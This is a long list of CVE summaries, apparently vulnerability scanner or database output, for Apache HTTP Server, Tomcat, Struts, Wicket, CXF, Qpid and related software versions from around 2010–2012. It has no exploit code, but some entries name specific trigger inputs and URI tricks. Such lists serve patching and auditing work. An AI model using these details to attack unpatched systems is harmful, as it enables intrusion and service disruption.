| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
8805| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
8806| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
